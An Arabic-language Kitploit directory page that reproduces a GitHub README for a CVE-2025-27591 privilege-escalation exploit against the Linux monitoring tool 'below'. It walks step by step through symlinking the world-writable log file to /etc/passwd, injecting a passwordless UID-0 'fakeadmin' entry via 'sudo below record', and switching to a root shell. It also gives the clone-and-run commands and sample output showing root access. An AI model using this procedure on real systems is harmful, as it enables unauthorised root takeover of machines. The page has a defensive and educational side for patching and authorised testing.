Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-27591 — 🔥 استغلال تصعيد الامتيازات المحلية لـ CVE-2025-27591 | يستخدم دليل سجلات قابل للكتابة عالميًا في Below للحصول على صلاحية الجذر عبر حقن /etc/passwd | Kitploit
أدوات/GitHubGitHub/00xcanelo/cve-2025-27591
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائية
GitHub00xcanelo/cve-2025-27591

CVE-2025-27591

🔥 استغلال تصعيد الامتيازات المحلية لـ CVE-2025-27591 | يستخدم دليل سجلات قابل للكتابة عالميًا في Below للحصول على صلاحية الجذر عبر حقن /etc/passwd

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-27591 – تصعيد الصلاحيات عبر استغلال الروابط الرمزية في below

Author CVE

🛑 تنويه: هذا الاستغلال مُقدم لأغراض تعليمية واختبار أمني مُصرَّح به فقط. الاستخدام غير المصرح به قد يكون غير قانوني.


🧠 نظرة عامة

below هي أداة مراقبة أداء طُوِّرَت بواسطة Facebook لأنظمة Linux. الإصدارات من below السابقة للإصدار المُصحَّح تتأثر بثغرة حرجة تسمح للمستخدمين غير المميزين بتصعيد الصلاحيات إلى الجذر عبر استغلال أدلة سجلات قابلة للكتابة عالمياً ومعالجة سجلات غير آمنة.


🔎 تفاصيل CVE


💥 منطق الاستغلال

يقوم هذا السكريبت Bash بما يلي:

  1. فحص وجود دليل قابل للكتابة عالمياً:

    • يتأكد مما إذا كان /var/log/below قابلاً للكتابة عالمياً (علامة خطر).
  2. تحضير هجوم الرابط الرمزي:

    • يحذف ملف error_root.log الحالي (إن وجد) وينشئ رابطاً رمزياً إلى /etc/passwd.
  3. بناء الحمولة:

    • يُلحق مستخدم جذر وهمي إلى /etc/passwd:
      root@kitploit:~
      fakeadmin::0:0:fakeadmin:/root:/bin/bash
      
  4. تشغيل التسجيل:

    • ينفذ sudo below record لإجبار البرنامج الثغري على كتابة السجلات.
  5. الحصول على وصول جذر:

    • يستخدم su fakeadmin للحصول على شل جذر بدون طلب كلمة مرور.

📁 هيكل الدليل

root@kitploit:~
CVE-2025-27591/
├── exploit.sh
├── README.md

✅ المتطلبات الأساسية

قبل تشغيل الاستغلال، تأكد من توفر ما يلي:

  • شل Bash (نظام Linux)
  • الثنائي الثغري مثبت: /usr/bin/below
  • دليل السجلات القابل للكتابة عالمياً: /var/log/below
  • صلاحيات sudo لتنفيذ: sudo below record
  • الأدوات المتوفرة:
    • ln (لإنشاء الروابط الرمزية)
    • su (لتبديل المستخدمين)
    • timeout (للتحكم في وقت التنفيذ)
    • whoami (لفحص الصلاحية)

🚀 خطوات الاستغلال

root@kitploit:~
# 1. استنساخ المستودع
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591

# 2. جعل السكريبت قابل للتنفيذ
chmod +x exploit.sh

# 3. تنفيذ الاستغلال
./exploit.sh

🧪 مثال على الإخراج

root@kitploit:~
[*] جاري التحقق من وجود ثغرة CVE-2025-27591...
[+] /var/log/below قابل للكتابة عالمياً.
[!] تم العثور على ملف سجل موجود: جاري إزالته...
[+] تم إنشاء رابط رمزي: /var/log/below/error_root.log -> /etc/passwd

[*] جاري كتابة السطر الخبيث إلى /tmp/fakeadmin
[*] جاري تشغيل التسجيل عبر 'sudo below record'...
[+] تم تنفيذ 'below record' (أو انتهت المهلة)

[*] محاولة كتابة الحمولة إلى /etc/passwd عبر الرابط الرمزي...
[+] تم إلحاق الحمولة بنجاح.

[*] محاولة التبديل إلى شل الجذر باستخدام 'su fakeadmin'...
root@target:/# whoami
root
تنزيل الأداة
الحقلالقيمة
CVE-IDCVE-2025-27591
الخطورة🔥 حرجة (CVSS ≈ 7.8 - 8.8)
متجه الهجوممحلي
التأثيرتصعيد صلاحيات إلى الجذر (UID=0)
نوع الاستغلالاستغلال الروابط الرمزية / حقن ملفات السجلات
التطبيق المتأثرbelow – يُثبَّت عادةً في /usr/bin/below
السبب الجذريكتابة ملفات غير آمنة إلى /var/log/below/ دون فحص الأذونات